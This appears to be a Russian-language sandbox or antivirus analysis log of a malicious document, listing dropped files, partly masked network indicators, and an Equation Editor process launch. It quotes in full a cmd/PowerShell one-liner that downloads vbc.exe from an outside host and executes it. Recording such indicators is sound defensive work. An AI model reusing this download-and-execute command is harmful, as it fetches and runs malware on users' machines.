Техническая информация
- '' (загружен из сети Интернет)
- 'C:\users\public\vbc.exe'
- http://19#.#3.251.109/kswbc/vbc.exe as %temp%\\vbc.exe
- C:\users\public\vbc.exe
- %TEMP%\vbc.exe
- '19#.#3.251.109':80
- 'im#.##ko.airforce':443
- http://19#.#3.251.109/windows/kswbc.exe
- http://19#.#3.251.109/kswbc/vbc.exe
- 'im#.##ko.airforce':443
- DNS ASK im#.##ko.airforce
- '%TEMP%\vbc.exe'
- '<SYSTEM32>\cmd.exe' /c powershell (New-Object System.Net.WebClient).DownloadFile('http://19#.#3.251.109/kswbc/vbc.exe', '%Temp%\\vbc.exe') & powershell Start-Process -FilePath '%Temp%\\vbc.exe' & exit' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c powershell (New-Object System.Net.WebClient).DownloadFile('http://19#.#3.251.109/kswbc/vbc.exe', '%Temp%\\vbc.exe') & powershell Start-Process -FilePath '%Temp%\\vbc.exe' & exit
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Start-Process -FilePath '%TEMP%\\vbc.exe'